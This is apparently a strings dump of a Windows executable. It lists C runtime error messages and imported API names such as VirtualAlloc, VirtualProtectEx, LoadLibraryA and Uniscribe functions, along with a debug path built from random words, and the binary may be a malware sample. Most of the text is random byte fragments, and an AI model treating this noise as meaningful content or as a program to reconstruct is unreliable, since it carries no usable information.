:!:2:e:s:
? :2j%a
2~k=wx
2rf.l%
2sYnFR
2toeFl
$$2$$V
3*303>3I3^3f3l3q3w3
3$3<3\3
353l3r3J4T4_4l4y4
36Uuu 
3(ecc|Qu
3<"HI`k
3Q#4X8
3RXV]@P
^3Se]x
3$$u	W
>3?=?W?]?f?~?
3x3+xPu
4(404;4I4~4
4"4)484B4I4P4V4l4s4z4
4,545:5@5F5K5Q5Y5_5g5o5u5
464?4H4O4_4q4
+4@#{rIM
?*?4???S?a?n?t?z?
54zxCV^
5-535C5N5`5s5~5
5"5?5I5W5b5j5
5%5:5k5r5
5)6A6q6
5hbGGu
5i&UU6
5j$$Vrjj
$$)5*SS]
5uYSVV
5U]Yx'Vx
!.;5"wT
616K6Q6d6j6p6u6}6
6*636P6
6$6(60646<6@6H6L6
66'OFj
696G6x6~6
6Je?-8
$$6L$$
$6$.q\
6S$$\GGg
6UMMB1MM
;%;,;7;@;
7%1MMj
7%7+707D7Q7W7k7t7~7
7$7,72787M7S7`7f7p7x7~7
7>7D7e7o7z7
.7x"zZ$6
8$$$;$
858L8g8
8%8/858x8
8&8F8X8s8y8
8;|;9|M
8c0!Ap
8=&j5+%f
$$$8$jj
8/,q"0
$8QFMy
8UWxiT
[94gU94
9#929;9A9Q9_9t9z9
9&9,91979G9P9j9{9
9$9=9G9R9\9j9~9
9%9C9T9g9|9
9Ede   o
@9	GGuu
9JMM[-
>9PNa\
9UruuUqU
a$,$$$]
aasiN,
abnormal program termination
aGG$\$
AJcot@
 .%aJxI
AK]/jSS"
= >A>O>V>a>s>~>
Ap`1`z{
=%=+=A=R=[=a=r=x=
A/r@in
ASji'j
"a$$SwS
aUUM'M
AuuU|QUG
AxSSjV
b8bN]0_D
B+ezG8&
$$$BF*$
?#bL4;
bMMUKU
Bn=OdM
B.rrdata
$$bSSG
@b??_@t
B?v`J@KbA
B~zu]}
$@c$$$
c>6 1t
 __C'E
$c	$MM
cN dio
CompareStringA
CompareStringW
C?oR@?
CpD2'Q
{!c\@r
CroPSW:
CUb;UGG=
$$$c$u^t
<!<D<^<c<v<|<
dgU:h)
*<d>hz N'
di e c
djG%xG\
,d,_.l
:~:(^dm
@D$$MFM
DMMOjuj
dM ~v{
DOMAIN error
D:\Other\Opposite\Chord\Will\Test\ask\Farm\over\surfaceFight.pdb
dr@mpi
DSUVWh
dt5Jdl
d/tbIo
DUq$$$
dUTUGG
DU_;UMM$
dYMkRxj
$$E`$$
E@7]VE
e8"lZbj6L
 e bhl
e$$@$$$h$
$[$$EL$
EnterCriticalSection
 e. ou
e@rVCar
Es tse
et trhe 
+E$$U$UUU
/EvYz#N
ExitProcess
F?esjM
f`GSS9
filo  
Fj.q3`
FjtjMM8SS
FlF=+t
- floating point not loaded
$f$MMvX
F$$$.$MMZ
FreeEnvironmentStringsA
FreeEnvironmentStringsW
f$$S$S
FxN|<<]
|F^y`C
G3\MkT+G
g++7*lY
GetACP
GetActiveWindow
GetCommandLineA
GetCommandLineW
GetCPInfo
GetCurrentProcess
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLocalTime
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleA
GetOEMCP
GetProcAddress
GetStartupInfoA
GetStartupInfoW
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemTime
GetSystemTimeAsFileTime
GetTimeZoneInformation
GetVersion
GetVolumeInformationW
GG>d$$
GGG'$$$'$
GGI:UU
GGj[j$$	
GGju4j
GG$k$jj
GGMjqM
$GG._rMM
GGShLS
GGt|rUU
GG$;$u
$GG'UU
GGuXu$$
Gh7GGG
GI=G$)
Gjj1jjSf
Gj%nY,
Gk&G$%R$
GkRG$$*
GLGUU^
Go=G $$
?gqSauS
	'$G%RG
GSGSS<
gS$$o]
$g$SSy
gthe.rc
,GUs!L
.GUSUjj4
GU+ (U
gUUM>M
GVjGUk
Gx3(t_
:G$$y%jj
$$($$H
H5;6.,
h$$5UU
h7f4E;
H' CQp
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
Hg)U1;,
HGUUyMM
hK#hV5
HMM$jj$UU5
h naigeNn
hNx`cpv
)HSGGb9
}htGLE
HUdXpU$$
$$HuuY
hwa0,ur  
H:Z3	-w
:HzTY+$
IAb\/O
Ic"IY~Qz
ID+eUU
iH`;-H
.II}]o
I$j0j$]q3$
in..A/
InitializeCriticalSection
iPzllK,
:.:I:r:
is@ItVe
$I$SSe
(It&(fY
<%=*=I=V=c=m=w=
Izy$$$
^$%@}j
j5cp"?
j5jM@GOM
/J6T$M
JanFebMarAprMayJunJulAugSepOctNovDec
$$j[bj
jDfjSS
jGGE$$
jGGt$$
jhY8=cd
_[jj$;$
$$< jj
)jjDUU4
jjg\$$Mi
jjGMUU
jjGqqG
jj_$$i
jj[jj/
$jjm1$$P
%jj#MMH6
jjMpMjjh
]jjSaS
jjub^u
jjU\U$
$[$j@jv.
jJVjMM
jjV[UOU
jMin\L:
j[mKl{V
JNuE	[&
j;pj$$
Jp-PE,
%$jQ2j
jq j$$
js$k"~
jtjUhU
JUU"$$
jUUL8$$
ju,vyG
jwhjMM
jw&Qj$$c]
j<XdjuuD
$=k&<.
&k3mdI
KERNEL32.dll
{'#-$	KI	
'K!"Iay
k-jj+$
Kjjs$$
(.| Km
k)MM$;"+
KN=+cML
KP62xs
Kth>}i
kUUUtUMm[MM
	KX3@b_V
KY	)hX
ky$$UPU
L]5&V1B
L$$ BN$$
LCMapStringA
LCMapStringW
lD3%`F
 l I Ut,n 
l$$$/LZ
/L;N+Y
LoadLibraryA
Lo@XMM
LX$$G gG
lXoF{K
M2oXMUa
M6<MGGA
_m%7dl
m@|;7U
|/MB&M$$
M$$bUU[o
($$MDMu
mels e s
Me_M$;
MeMUUA
MeoMjj
MessageBoxA
$mFV$GG
Microsoft Visual C++ Runtime Library
MjajUU
mlOatw
MLW4h5
@$$M~M
$	$	MM
$`	+MM1
MM5R$$G
MM$BO$$$
MME$$G
MMe"MM
MM$f$S
MMGNMM
$MMGuu^
mMiYl'
~MM?jj
M^~MjjE
MMjmejMM
?MMj{tj
MMjV4j$$
MMJwjj
MMM3MU
MMM/GGSMrUU
MM;MM]
MM!_MM
MMMqMMM
#MMM(yMM
MMn/$$L
MMO$f$
MM|OGG
MM+PGG
MM?r]T3LM
+MMS1\bS
MM%S$$5
MMu3MM
MMuM$$
MMu;Ru
MM.UU9
!$MMw$$$_N
MMzZMMq
MNaFMuu
!mNU^B
mQQeM9
MS0Mq0
MultiByteToWideChar
MUU%$$
mUU$U$jj
MVMGG	
M$$y_,
"Mzx<r{J
n1hI(rhnaII
n2/>T3
$n4$uD
nAtn@$
   n e
n ,icer
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
@npa@no$
n%SS,P
	NU`x[
n$$$w$
$$$\o$
o2Cqw!
OGG8uu
o$H$UU
_o_J?O
o ort s,S
ot3anv
</<<<O<U<[<
$$~OUU$
oVSopcrTeO
oW4z;:
p1WK!m
P 5]z[w
p_a-MMM_n
$,p$G#
pGVGUU
Pjju#u$$
p$$*KM2
PrepareTape
Program: 
<program name unknown>
P$r@uEJ
$PSSSyMM
"pS-[T:8
pU/olCc
- pure virtual function call
];q`+)
$"q$$$'
q$>!\$
Q~$$$ 
!q8$$#
$$QbMMj	jSSp
Q\f&fY
qgbuuU
qL.T:;
QNCN,s
QQSVW3
QSUVW3
quu7$$
$Q	$U_[Uq7
Q#UX#^
*\R1F4RoG)`
r>%3,"
R3(INwT
!R@4ZSSn
rB$$$c$$
.rdata
RE.`lI
.reloc
RichB5
@Rr=aT
RSS?xU4U
RtlUnwind
rtobci
runtime error 
Runtime Error!
r$Vbo\
R!x\J-
$$*$$S
,sAddz
ScriptApplyDigitSubstitution
ScriptApplyLogicalWidth
ScriptBreak
ScriptCacheGetHeight
ScriptFreeCache
ScriptGetCMap
ScriptGetFontProperties
ScriptGetGlyphABCWidth
ScriptIsComplex
ScriptItemize
ScriptJustify
ScriptLayout
ScriptPlace
ScriptRecordDigitSubstitution
ScriptStringCPtoX
ScriptStringFree
ScriptString_pLogAttr
ScriptStringValidate
ScriptStringXtoCP
ScriptTextOut
ScriptXtoCP
 Seaao u
SEASUX
SetEnvironmentVariableA
SetHandleCount
SFjj<P
$SI9SS
SING error
$$SjxK
SjYTl`
S'$K$$$f
sL!b!:
$$SM1M
}SMMaE
#>sn 0J
SNSS9S
Sn#SUU
srD	ib[
$$\;SS
SS72MMp
SSjm\<
SSLUU$
$SS;PMM
SSrMM#
SSSaI'$$
^SSSSS
SSSUuu	p
SS{tjj
SS}USS
StiCreateInstanceW
STI.dll
SUBhU:ZSS
@S$$UC$$0UU
SunMonTueWedThuFriSat
~S,`V6
|SwSMM5
!sxt'x9
$$SySS
@tAoIVC
t:Azzm
TbGDCN
tbJg\I
t|c8%Z
TerminateProcess
!This program cannot be run in DOS mode.
!tIc|~
,^Tjjj
Tles n
TLOSS error
tm,W?@
!tN^PE
toJF-R!
	T[~Qf2
tSS$&$$"
tte2th
 ttrbtf
t.;t$$t(
tuSSYQ
tu;uH=
Tuuu~u
t/WWUPj
;$$-$$U
"U$$~\
U1uU1F
u$51;E
U6UJUU
u8Uu$$
U9sUj1
$Uag@U@u
$$UcDU
UCjpV\~U
UDGG36
UEUUuup$$
U(fU$$
>:u#FV
u$$$g0
`uGGjP~
UGoUUl7U
UgU$$m
UGXtjG
U$$H5R
U}HU$$r"$$
%uIuUU
Uje)jMM
$)u$jj
ujjEP9
U$-_$j#jX
$UL>d6
U#LUjj3
{u LXE
U$$Mk<M
) UMM4
uMMxjuu
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
>:uNFV
UnhandledExceptionFilter
`uNnMM
UN"USO_S
,uoJS(
=uOuSS
]:uP+R
user32.dll
USP10.dll
u$sU$$
\US|U$$
U$~s$XH
uT4=b`
UtgRrK
U tuu$Ap$
$(]$uu|
$$-uu$
%U_~U$$
UU$#	$
!<UU47	
uu^6MM
UU7PSS
UU{9uu
UUAeD$$
uuauuj
$UU BM
UU"$$c
UU$*,c$
UU,C{3d
UUcLjj
U"~ue1B
UU$E$uu
UUEUU%
UU.!GG
u$/uhi
UUlJ$$
uuMaM$
UUMiMM
U,uMMH
uu$ms$
UUm$SS
*uuMyM
UU^pMMK
U{U$r$
UUrHSSL
uu-?SS
$$u USS
u.utJ(
UUU%$$
uuUgUUP,
u(uujj.
UUUmgZy
UUUpoUU}8
uu^UU1
uu~UU$j
UUU+USS
$/$uu$uuW
uu]uuz
UUu$Vu
UUWuu	
uuxUUN
UU*YSS_
uu\$$zMM
uuzuu_
UwUMFM
*U{x-N
UyU*UM,FM
uZku$$
$$$V]$
$V$$$$
=>v7qD
VC20XC00U
vcI>PoU$
vcV	8c3
V#fS8]x
vI$$lt
VirtualAlloc
VirtualFree
VirtualProtectEx
&VjjwS
=V>_>l>}>X?p?w?
vlY3m=
v$$M\M
@Vn@@C
VqdQ`	e
`vSSym
Vus<X4
W],}-\
$wC(E_
WideCharToMultiByte
$WJsx3
%woHs$$
w\O$$S
WriteFile
>&W!UK
WUU##BH
w$uuUkU
wUuuVBSS&jj
$$wVMM
x5UUBn
XCMM$@$
x?D	ppZL
X"fI;!
$$x#MMM
=xN5fE
x@oAoo
`.xSSU
&Y1\jj
Y"~*'9
yA$$$/
ybHtHM
Yb^[iv
YCw3S]
ydN$$9#]Z
$-yG?(
 ynbOi
ynpu91
(ys96$
.$$YSdMMt
ytJ#0D
$#Y$UU
=Yx4^{
yy3	5I
 $$zdj
zH%UUM"
.zMM]U
$z$$O_
zUUWm$W$
z^UUYc
zUUz$$